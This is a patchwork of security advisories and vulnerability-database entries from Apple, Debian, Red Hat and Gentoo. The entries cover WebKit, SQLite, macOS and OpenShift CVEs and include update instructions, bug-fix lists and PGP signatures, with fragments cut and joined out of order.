-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAl9igm4ACgkQZcsbuWJ6
jjDK/hAAndL9caBfy/uHMnz9jhpDNrJuDai5gTZeAhUSwRalVppYwTEMpcSrx7u6
O7R0uLcvd1v9AiTGpF2zcERNlQbd7L1GaErPBaWnPbXSzLoUDkCNxuw5S+EEGuF5
nOxvh+qaS1ISny6teXpW6VLvLqV6n3BuNHUAbyP1JuF/EB7V9R1MD8zOUM7jsn6t
Lwyz++s1nQbwt2jH1OKZa0pP2cSjVJjlKi8iDnFnMUjaSn8LCsgNXTsvipX8rA7r
aeUxlPkIA2bwM5/0CFoPWpoPjNKXxoADjryJOat0GjPp/dSewrXncE/aKvrJGcJ7
Hwg4Q2Ep8a6NKL1QZ3ST64kf28UTA06xcypzinIpJVqtLj8LOvRDUGak3h+xETHB
E4evSHlNfDzKrzu7kArguneeh4IwSpN1kSc4kt2rGpAQ0ch0bT34AzbNDpoUidm1
oPU3WVcEeBD9PYKGAWMiBcm3X6B0wHsAYDLCgkqnxrbDgz7NlsmVIl3dvrVbLrl1
jxaVaofaqANk+uTzoB1QArZRowf5GzW17htRijPazna1qYHo6jp/fzrGbdoMDuhb
80JpytEZrrVvscbth4bTeex52ibn1XFM9kqAX/Mfxaob2zBKt0fF6v3utFRKmx9g
fhqMR3CPf7QVG8mlYMQ57OT7iuQ4lYkFw9qGgPI4SGWiMWWVtUU=
=7kDq
-----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2020-11-13-6 Additional information for
APPLE-SA-2020-09-16-4 watchOS 7.0
watchOS 7.0 addresses the following issues. Information about the
security content is also available at
https://support.apple.com/HT211844.
CVE-2020-13434
CVE-2020-13435
CVE-2020-9991
Entry added November 12, 2020
SQLite
Available for: Apple Watch Series 3 and later
Impact: Multiple issues in SQLite
Description: Multiple issues were addressed by updating SQLite to
version 3.32.3.
Entry added November 12, 2020
Safari
We would like to acknowledge Andreas Gutmann (@KryptoAndI) of
OneSpan's Innovation Centre (onespan.com) and University College
London, Steven J. Murdoch (@SJMurdoch) of OneSpan's Innovation Centre
(onespan.com) and University College London, Jack Cable of Lightning
Security, Ryan Pickren (ryanpickren.com), Yair Amit for their
assistance.
Entry added November 12, 2020
Installation note:
Instructions on how to update your Apple Watch software are
available at https://support.apple.com/kb/HT204641
To check the version on your Apple Watch, open the Apple Watch app
on your iPhone and select "My Watch > General > About".
Alternatively, on your watch, select "My Watch > General > About"
| VAR-202010-1510 | CVE-2020-9948 | Safari Mistyped vulnerabilities in |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
A type confusion issue was addressed with improved memory handling. This issue is fixed in Safari 14.0. Processing maliciously crafted web content may lead to arbitrary code execution. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the optimization of calls to String.prototype.replace. By performing actions in JavaScript, an attacker can trigger a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Apple Safari is a web browser of Apple (Apple), the default browser included with Mac OS X and iOS operating systems.
For the stable distribution (buster), these problems have been fixed in
version 2.30.3-1~deb10u1.
We recommend that you upgrade your webkit2gtk packages.
For the detailed security status of webkit2gtk please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/webkit2gtk
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAl+9VFEACgkQEMKTtsN8
TjYEjxAAqmkeiTdQiA8yAT5zv5oSuYbpbfmrUdifh2QJLw9cRpaXvjfd9NcbigtZ
z+sLX0xSk5m2vMHQksP60fh9jyMrFbrOnEqBYBkBEuEdh6RZ8td6S9UCRlXlJg/M
6ztH38LMwAmF7MEltU1xLpZbN++Lrd6D+rr6qFuCxs62jM0Ly4DQe9LUpRtq5gS1
S9V4dwlbay012NEP4v0Fdh2+EdlKzzNAcc7SNsj2Are3uBpQ3YuN3ROCO3GSmHzR
tXQfW8zKWs7dVRiHVAdGiIFatYIhrl/Ra5R4HN2YWDIRis17FHLUxacK34EKjqcl
boV9GCf/zSA2mvccUri0qJoqUpLivXGqRsuheItrZlwZ6ncmdHE+MWXCr7ClSGjc
gzwL4w/kf7MxVXvmNJCZTBnc1Has143lYWuVGKavURJ7KM2zwP/e5UcNJ+T7xYdF
YHTOHZCCBaQjZwz6nwKMq5WK/RM4HlvBxaFJYE9NDrODE4TWmIkTI7bCMRRq0jo1
uN2dYEf/8WnfyR4dOTFjfUl+Ervt0/Hi098vHPb7X/4Xx9heNecw2xun0bsL5BU1
rpuJdsclVt3rFvGGBU2IorIUSMlUZtRz9OQnysRjUyKJM6L7hWIdTKJ5rDWGVZdj
dNOqEC6cb1fFEK7ttYgQHu8wcOyK1LpjrTwc5y/tEr8jysWHOro=
=x9Ca
-----END PGP SIGNATURE-----
. Bugs fixed (https://bugzilla.redhat.com/):
1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve
1945703 - "Guest OS Info" availability in VMI describe is flaky
1958816 - [2.6.z] KubeMacPool fails to start due to OOM likely caused by a high number of Pods running in the cluster
1963275 - migration controller null pointer dereference
1965099 - Live Migration double handoff to virt-handler causes connection failures
1965181 - CDI importer doesn't report AwaitingVDDK like it used to
1967086 - Cloning DataVolumes between namespaces fails while creating cdi-upload pod
1967887 - [2.6.6] nmstate is not progressing on a node and not configuring vlan filtering that causes an outage for VMs
1969756 - Windows VMs fail to start on air-gapped environments
1970372 - Virt-handler fails to verify container-disk
1973227 - segfault in virt-controller during pdb deletion
1974084 - 2.6.6 containers
1975212 - No Virtual Machine Templates Found [EDIT - all templates are marked as depracted]
1975727 - [Regression][VMIO][Warm] The third precopy does not end in warm migration
1977756 - [2.6.z] PVC keeps in pending when using hostpath-provisioner
1982760 - [v2v] no kind VirtualMachine is registered for version \"kubevirt.io/v1\" i...
1986989 - OpenShift Virtualization 2.6.z cannot be upgraded to 4.8.0 initially deployed starting with <= 4.8
5. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: Red Hat OpenShift Container Storage 4.6.5 security and bug fix update
Advisory ID: RHSA-2021:2479-01
Product: Red Hat OpenShift Container Storage
Advisory URL: https://access.redhat.com/errata/RHSA-2021:2479
Issue date: 2021-06-17
CVE Names: CVE-2016-10228 CVE-2017-14502 CVE-2019-2708
CVE-2019-3842 CVE-2019-9169 CVE-2019-13012
CVE-2019-14866 CVE-2019-25013 CVE-2020-8231
CVE-2020-8284 CVE-2020-8285 CVE-2020-8286
CVE-2020-8927 CVE-2020-9948 CVE-2020-9951
CVE-2020-9983 CVE-2020-13434 CVE-2020-13543
CVE-2020-13584 CVE-2020-13776 CVE-2020-15358
CVE-2020-24977 CVE-2020-25659 CVE-2020-25678
CVE-2020-26116 CVE-2020-26137 CVE-2020-27618
CVE-2020-27619 CVE-2020-27783 CVE-2020-28196
CVE-2020-29361 CVE-2020-29362 CVE-2020-29363
CVE-2020-36242 CVE-2021-3139 CVE-2021-3177
CVE-2021-3326 CVE-2021-3449 CVE-2021-3450
CVE-2021-3528 CVE-2021-20305 CVE-2021-23239
CVE-2021-23240 CVE-2021-23336
====================================================================
1. Summary:
Updated images that fix one security issue and several bugs are now
available for Red Hat OpenShift Container Storage 4.6.5 on Red Hat
Enterprise Linux 8 from Red Hat Container Registry.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Description:
Red Hat OpenShift Container Storage is software-defined storage integrated
with and optimized for the Red Hat OpenShift Container Platform. Red Hat
OpenShift Container Storage is a highly scalable, production-grade
persistent storage for stateful applications running in the Red Hat
OpenShift Container Platform. In addition to persistent storage, Red Hat
OpenShift Container Storage provisions a multicloud data management service
with an S3 compatible API.
Security Fix(es):
* NooBaa: noobaa-operator leaking RPC AuthToken into log files
(CVE-2021-3528)
For more details about the security issue(s), including the impact, a CVSS
score, and other related information, refer to the CVE page(s) listed in
the References section.
Bug Fix(es):
* Currently, a newly restored PVC cannot be mounted if some of the
OpenShift Container Platform nodes are running on a version of Red Hat
Enterprise Linux which is less than 8.2, and the snapshot from which the
PVC was restored is deleted.
Workaround: Do not delete the snapshot from which the PVC was restored
until the restored PVC is deleted. (BZ#1962483)
* Previously, the default backingstore was not created on AWS S3 when
OpenShift Container Storage was deployed, due to incorrect identification
of AWS S3. With this update, the default backingstore gets created when
OpenShift Container Storage is deployed on AWS S3. (BZ#1927307)
* Previously, log messages were printed to the endpoint pod log even if the
debug option was not set. With this update, the log messages are printed to
the endpoint pod log only when the debug option is set. (BZ#1938106)
* Previously, the PVCs could not be provisioned as the `rook-ceph-mds` did
not register the pod IP on the monitor servers, and hence every mount on
the filesystem timed out, resulting in CephFS volume provisioning failure.
With this update, an argument `--public-addr=podIP` is added to the MDS pod
when the host network is not enabled, and hence the CephFS volume
provisioning does not fail. (BZ#1949558)
* Previously, OpenShift Container Storage 4.2 clusters were not updated
with the correct cache value, and hence MDSs in standby-replay might report
an oversized cache, as rook did not apply the `mds_cache_memory_limit`
argument during upgrades. With this update, the `mds_cache_memory_limit`
argument is applied during upgrades and the mds daemon operates normally.
(BZ#1951348)
* Previously, the coredumps were not generated in the correct location as
rook was setting the config option `log_file` to an empty string since
logging happened on stdout and not on the files, and hence Ceph read the
value of the `log_file` to build the dump path. With this update, rook does
not set the `log_file` and keeps Ceph's internal default, and hence the
coredumps are generated in the correct location and are accessible under
`/var/log/ceph/`. (BZ#1938049)
* Previously, Ceph became inaccessible, as the mons lose quorum if a mon
pod was drained while another mon was failing over. With this update,
voluntary mon drains are prevented while a mon is failing over, and hence
Ceph does not become inaccessible. (BZ#1946573)
* Previously, the mon quorum was at risk, as the operator could erroneously
remove the new mon if the operator was restarted during a mon failover.
With this update, the operator completes the same mon failover after the
operator is restarted, and hence the mon quorum is more reliable in the
node drains and mon failover scenarios. (BZ#1959983)
All users of Red Hat OpenShift Container Storage are advised to pull these
new images from the Red Hat Container Registry.
3. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
4. Bugs fixed (https://bugzilla.redhat.com/):
1938106 - [GSS][RFE]Reduce debug level for logs of Nooba Endpoint pod
1950915 - XSS Vulnerability with Noobaa version 5.5.0-3bacc6b
1951348 - [GSS][CephFS] health warning "MDS cache is too large (3GB/1GB); 0 inodes in use by clients, 0 stray files" for the standby-replay
1951600 - [4.6.z][Clone of BZ #1936545] setuid and setgid file bits are not retained after a OCS CephFS CSI restore
1955601 - CVE-2021-3528 NooBaa: noobaa-operator leaking RPC AuthToken into log files
1957189 - [Rebase] Use RHCS4.2z1 container image with OCS 4..6.5[may require doc update for external mode min supported RHCS version]
1959980 - When a node is being drained, increase the mon failover timeout to prevent unnecessary mon failover
1959983 - [GSS][mon] rook-operator scales mons to 4 after healthCheck timeout
1962483 - [RHEL7][RBD][4.6.z clone] FailedMount error when using restored PVC on app pod
5. References:
https://access.redhat.com/security/cve/CVE-2016-10228
https://access.redhat.com/security/cve/CVE-2017-14502
https://access.redhat.com/security/cve/CVE-2019-2708
https://access.redhat.com/security/cve/CVE-2019-3842
https://access.redhat.com/security/cve/CVE-2019-9169
https://access.redhat.com/security/cve/CVE-2019-13012
https://access.redhat.com/security/cve/CVE-2019-14866
https://access.redhat.com/security/cve/CVE-2019-25013
https://access.redhat.com/security/cve/CVE-2020-8231
https://access.redhat.com/security/cve/CVE-2020-8284
https://access.redhat.com/security/cve/CVE-2020-8285
https://access.redhat.com/security/cve/CVE-2020-8286
https://access.redhat.com/security/cve/CVE-2020-8927
https://access.redhat.com/security/cve/CVE-2020-9948
https://access.redhat.com/security/cve/CVE-2020-9951
https://access.redhat.com/security/cve/CVE-2020-9983
https://access.redhat.com/security/cve/CVE-2020-13434
https://access.redhat.com/security/cve/CVE-2020-13543
https://access.redhat.com/security/cve/CVE-2020-13584
https://access.redhat.com/security/cve/CVE-2020-13776
https://access.redhat.com/security/cve/CVE-2020-15358
https://access.redhat.com/security/cve/CVE-2020-24977
https://access.redhat.com/security/cve/CVE-2020-25659
https://access.redhat.com/security/cve/CVE-2020-25678
https://access.redhat.com/security/cve/CVE-2020-26116
https://access.redhat.com/security/cve/CVE-2020-26137
https://access.redhat.com/security/cve/CVE-2020-27618
https://access.redhat.com/security/cve/CVE-2020-27619
https://access.redhat.com/security/cve/CVE-2020-27783
https://access.redhat.com/security/cve/CVE-2020-28196
https://access.redhat.com/security/cve/CVE-2020-29361
https://access.redhat.com/security/cve/CVE-2020-29362
https://access.redhat.com/security/cve/CVE-2020-29363
https://access.redhat.com/security/cve/CVE-2020-36242
https://access.redhat.com/security/cve/CVE-2021-3139
https://access.redhat.com/security/cve/CVE-2021-3177
https://access.redhat.com/security/cve/CVE-2021-3326
https://access.redhat.com/security/cve/CVE-2021-3449
https://access.redhat.com/security/cve/CVE-2021-3450
https://access.redhat.com/security/cve/CVE-2021-3528
https://access.redhat.com/security/cve/CVE-2021-20305
https://access.redhat.com/security/cve/CVE-2021-23239
https://access.redhat.com/security/cve/CVE-2021-23240
https://access.redhat.com/security/cve/CVE-2021-23336
https://access.redhat.com/security/updates/classification/#moderate
6. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBYMtu/9zjgjWX9erEAQh6fhAAm9UPxF0e8ubzCEae+bkQAduwCkzpQ0ND
Q1/UcDAAc4ueEhBrwXPhOLrgfBj+VG+QA19YZcNPzbW7I48RGjCm5WccnUyEbFAo
FKTspCZW7FkXKBU15u58c/sFCGa4/Yuu+IpqCMuZ6lR2g9WHIBKdVtaB4y59AyfS
v59cAorqZ3AoTX4lVys6HfDGySQWlg5P8t6ST72cUJjESi6U0HV00P7ECU2SFxCF
HXA4gbXbZ1EPb/1+UkRRnXemJuT8SaRFRTrzj9woTrVAGQFvn+yjxLbZxVZb0WDd
6QeNpiJNICfL+/ExvEmGQucf7NcekYPWud11pnRUfQ+Uqsj+I7YoaepXAAolLzvN
kAVVpFNsWADOVz7BrfSKoo4b38UCFOEUSd2d1ijCNE96Q9XyNUpn+kZqz0/wpBQC
L+E5N9kEuaLyDBoI0wJAfoqU1NY4Cvl6lIMDgHUv2CE10zxhFwHCDulAfcQgxNQG
sIbpSgSegq9HfZSDxa6Rtrox1I7oGhnBy10sIwUUH1+fxAusUk+Xrxf8hUv8KgDz
V144yrGwN/6KVxh74A60bJX3ai12l6fC8bkmsxg5K1r/Dk4tUkQeXNdBbaK/rEKO
AQs7YDab/0VA2qKtXDRkbnzqBRSbamDNOO/jd28nGMoclaIRHCzQgJRFv6Qb6dwT
RCrstqAM5QQ=DHD0
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce
. See the following advisory for the RPM packages for this
release:
https://access.redhat.com/errata/RHSA-2021:2122
Space precludes documenting all of the container images in this advisory.
See the following Release Notes documentation, which will be updated
shortly for this release, for details about these changes:
https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel
ease-notes.html
This update fixes the following bug among others:
* Previously, resources for the ClusterOperator were being created early in
the update process, which led to update failures when the ClusterOperator
had no status condition while Operators were updating. This bug fix changes
the timing of when these resources are created. As a result, updates can
take place without errors. (BZ#1959238)
Security Fix(es):
* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index
validation (CVE-2021-3121)
You may download the oc tool and use it to inspect release image metadata
as follows:
(For x86_64 architecture)
$ oc adm release info
quay.io/openshift-release-dev/ocp-release:4.7.13-x86_64
The image digest is
sha256:783a2c963f35ccab38e82e6a8c7fa954c3a4551e07d2f43c06098828dd986ed4
(For s390x architecture)
$ oc adm release info
quay.io/openshift-release-dev/ocp-release:4.7.13-s390x
The image digest is
sha256:4cf44e68413acad063203e1ee8982fd01d8b9c1f8643a5b31cd7ff341b3199cd
(For ppc64le architecture)
$ oc adm release info
quay.io/openshift-release-dev/ocp-release:4.7.13-ppc64le
The image digest is
sha256:d47ce972f87f14f1f3c5d50428d2255d1256dae3f45c938ace88547478643e36
All OpenShift Container Platform 4.7 users are advised to upgrade to these
updated packages and images when they are available in the appropriate
release channel. To check for available updates, use the OpenShift Console
or the CLI oc command. Instructions for upgrading a cluster are available
at
https://docs.openshift.com/container-platform/4.7/updating/updating-cluster
- -between-minor.html#understanding-upgrade-channels_updating-cluster-between
- -minor
3. Solution:
For OpenShift Container Platform 4.7 see the following documentation, which
will be updated shortly for this release, for important instructions on how
to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel
ease-notes.html
Details on how to access this content are available at
https://docs.openshift.com/container-platform/4.7/updating/updating-cluster
- -cli.html
4. Bugs fixed (https://bugzilla.redhat.com/):
1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation
1923268 - [Assisted-4.7] [Staging] Using two both spelling "canceled" "cancelled"
1947216 - [AWS] Missing iam:ListAttachedRolePolicies permission in permissions.go
1953963 - Enable/Disable host operations returns cluster resource with incomplete hosts list
1957749 - ovn-kubernetes pod should have CPU and memory requests set but not limits
1959238 - CVO creating cloud-controller-manager too early causing upgrade failures
1960103 - SR-IOV obliviously reboot the node
1961941 - Local Storage Operator using LocalVolume CR fails to create PV's when backend storage failure is simulated
1962302 - packageserver clusteroperator does not set reason or message for Available condition
1962312 - Deployment considered unhealthy despite being available and at latest generation
1962435 - Public DNS records were not deleted when destroying a cluster which is using byo private hosted zone
1963115 - Test verify /run filesystem contents failing
5. Bugs fixed (https://bugzilla.redhat.com/):
1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation
5. JIRA issues fixed (https://issues.jboss.org/):
LOG-1328 - Port fix to 5.0.z for BZ-1945168
6. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 202012-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: WebkitGTK+: Multiple vulnerabilities
Date: December 23, 2020
Bugs: #755947
ID: 202012-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in WebKitGTK+, the worst of
which could result in the arbitrary execution of code.
Background
==========
WebKitGTK+ is a full-featured port of the WebKit rendering engine,
suitable for projects requiring any kind of web integration, from
hybrid HTML/CSS applications to full-fledged web browsers.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-libs/webkit-gtk < 2.30.3 >= 2.30.3
Description
===========
Multiple vulnerabilities have been discovered in WebKitGTK+. Please
review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All WebkitGTK+ users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.30.3"
References
==========
[ 1 ] CVE-2020-13543
https://nvd.nist.gov/vuln/detail/CVE-2020-13543
[ 2 ] CVE-2020-13584
https://nvd.nist.gov/vuln/detail/CVE-2020-13584
[ 3 ] CVE-2020-9948
https://nvd.nist.gov/vuln/detail/CVE-2020-9948
[ 4 ] CVE-2020-9951
https://nvd.nist.gov/vuln/detail/CVE-2020-9951
[ 5 ] CVE-2020-9952
https://nvd.nist.gov/vuln/detail/CVE-2020-9952
[ 6 ] CVE-2020-9983
https://nvd.nist.gov/vuln/detail/CVE-2020-9983
[ 7 ] WSA-2020-0008
https://webkitgtk.org/security/WSA-2020-0008.html
[ 8 ] WSA-2020-0009
https://webkitgtk.org/security/WSA-2020-0009.html
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/202012-10
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2020 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5
.
CVE-2020-9951: Marcin 'Icewall' Noga of Cisco Talos
WebKit
Available for: macOS Catalina and macOS Mojave, and included in macOS
Big Sur
Impact: Processing maliciously crafted web content may lead to a
cross site scripting attack
Description: An input validation issue was addressed with improved
input validation.
CVE-2020-9952: Ryan Pickren (ryanpickren.com)
WebKit
Available for: macOS Catalina and macOS Mojave, and included in macOS
Big Sur
Impact: Processing maliciously crafted web content may lead to code
execution
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9983: zhunki
Installation note:
Safari 14.0 may be obtained from the Mac App Store
| VAR-202010-1288 | CVE-2020-9887 | macOS Memory Corruption Vulnerability in |
CVSS V2: 6.8 CVSS V3: 7.8 Severity: HIGH |
A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6. Viewing a maliciously crafted JPEG file may lead to arbitrary code execution. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. Interaction with the ImageIO library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.The specific flaw exists within the AppleVPA framework. Crafted data in a JPEG image can trigger a write past the end of an allocated data structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Apple macOS Catalina is a set of dedicated operating systems developed by Apple for Mac computers
| VAR-202010-1517 | CVE-2020-9968 | plural Apple Product logic vulnerabilities |
CVSS V2: 4.3 CVSS V3: 5.5 Severity: MEDIUM |
A logic issue was addressed with improved restrictions. This issue is fixed in iOS 14.0 and iPadOS 14.0, macOS Catalina 10.15.7, tvOS 14.0, watchOS 7.0. A malicious application may be able to access restricted files. plural Apple A logic vulnerability exists in the product due to a flawed handling of restrictions.Malicious applications can gain access to restricted files. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2020-09-16-1 iOS 14.0 and iPadOS 14.0
iOS 14.0 and iPadOS 14.0 are now available and address the following:
AppleAVD
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to cause unexpected system
termination or write kernel memory
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9958: Mohamed Ghannam (@_simo36)
Assets
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An attacker may be able to misuse a trust relationship to
download malicious content
Description: A trust issue was addressed by removing a legacy API.
CVE-2020-9979: CodeColorist of Ant-Financial LightYear Labs
Icons
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to identify what other
applications a user has installed
Description: The issue was addressed with improved handling of icon
caches.
CVE-2020-9773: Chilik Tamir of Zimperium zLabs
IDE Device Support
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An attacker in a privileged network position may be able to
execute arbitrary code on a paired device during a debug session over
the network
Description: This issue was addressed by encrypting communications
over the network to devices running iOS 14, iPadOS 14, tvOS 14, and
watchOS 7.
CVE-2020-9992: Dany Lisiansky (@DanyL931), Nikias Bassen
IOSurfaceAccelerator
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A local user may be able to read kernel memory
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2020-9964: Mohamed Ghannam (@_simo36), Tommy Muir (@Muirey03)
Keyboard
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to leak sensitive user
information
Description: A logic issue was addressed with improved state
management.
CVE-2020-9976: Rias A. Sherzad of JAIDE GmbH in Hamburg, Germany
Model I/O
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted USD file may lead to
unexpected application termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9973: Aleksandar Nikolic of Cisco Talos
Phone
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: The screen lock may not engage after the specified time
period
Description: This issue was addressed with improved checks.
CVE-2020-9946: Daniel Larsson of iolight AB
Sandbox
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to access restricted
files
Description: A logic issue was addressed with improved restrictions.
CVE-2020-9968: Adam Chester(@xpn) of TrustedSec
Siri
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A person with physical access to an iOS device may be able to
view notification contents from the lockscreen
Description: A lock screen issue allowed access to messages on a
locked device.
CVE-2020-9959: an anonymous researcher, an anonymous researcher, an
anonymous researcher, an anonymous researcher, an anonymous
researcher, Andrew Goldberg The University of Texas at Austin,
McCombs School of Business, Meli̇h Kerem Güneş of Li̇v College, Sinan
Gulguler
WebKit
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing maliciously crafted web content may lead to a
cross site scripting attack
Description: An input validation issue was addressed with improved
input validation.
CVE-2020-9952: Ryan Pickren (ryanpickren.com)
Additional recognition
App Store
We would like to acknowledge Giyas Umarov of Holmdel High School for
their assistance.
Bluetooth
We would like to acknowledge Andy Davis of NCC Group and Dennis
Heinze (@ttdennis) of TU Darmstadt, Secure Mobile Networking Lab for
their assistance.
CallKit
We would like to acknowledge Federico Zanetello for their assistance.
CarPlay
We would like to acknowledge an anonymous researcher for their
assistance.
Core Location
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.
debugserver
We would like to acknowledge Linus Henze (pinauten.de) for their
assistance.
iAP
We would like to acknowledge Andy Davis of NCC Group for their
assistance.
iBoot
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
Kernel
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
libarchive
We would like to acknowledge Dzmitry Plotnikau and an anonymous
researcher for their assistance.
Location Framework
We would like to acknowledge an anonymous researcher for their
assistance.
Maps
We would like to acknowledge Matthew Dolan of Amazon Alexa for their
assistance.
NetworkExtension
We would like to acknowledge Thijs Alkemade of Computest and ‘Qubo
Song’ of ‘Symantec, a division of Broadcom’ for their assistance.
Phone Keypad
We would like to acknowledge an anonymous researcher for their
assistance.
Status Bar
We would like to acknowledge Abdul M. Majumder, Abdullah Fasihallah
of Taif university, Adwait Vikas Bhide, Frederik Schmid, Nikita, and
an anonymous researcher for their assistance.
Telephony
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.
UIKit
We would like to acknowledge Borja Marcos of Sarenet, Simon de Vegt,
and Talal Haj Bakry (@hajbakri) and Tommy Mysk (@tommymysk) of Mysk
Inc for their assistance.
Web App
We would like to acknowledge Augusto Alvarez of Outcourse Limited for
their assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "iOS 14.0 and iPadOS 14.0".
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAl9igm4ACgkQZcsbuWJ6
jjDK/hAAndL9caBfy/uHMnz9jhpDNrJuDai5gTZeAhUSwRalVppYwTEMpcSrx7u6
O7R0uLcvd1v9AiTGpF2zcERNlQbd7L1GaErPBaWnPbXSzLoUDkCNxuw5S+EEGuF5
nOxvh+qaS1ISny6teXpW6VLvLqV6n3BuNHUAbyP1JuF/EB7V9R1MD8zOUM7jsn6t
Lwyz++s1nQbwt2jH1OKZa0pP2cSjVJjlKi8iDnFnMUjaSn8LCsgNXTsvipX8rA7r
aeUxlPkIA2bwM5/0CFoPWpoPjNKXxoADjryJOat0GjPp/dSewrXncE/aKvrJGcJ7
Hwg4Q2Ep8a6NKL1QZ3ST64kf28UTA06xcypzinIpJVqtLj8LOvRDUGak3h+xETHB
E4evSHlNfDzKrzu7kArguneeh4IwSpN1kSc4kt2rGpAQ0ch0bT34AzbNDpoUidm1
oPU3WVcEeBD9PYKGAWMiBcm3X6B0wHsAYDLCgkqnxrbDgz7NlsmVIl3dvrVbLrl1
jxaVaofaqANk+uTzoB1QArZRowf5GzW17htRijPazna1qYHo6jp/fzrGbdoMDuhb
80JpytEZrrVvscbth4bTeex52ibn1XFM9kqAX/Mfxaob2zBKt0fF6v3utFRKmx9g
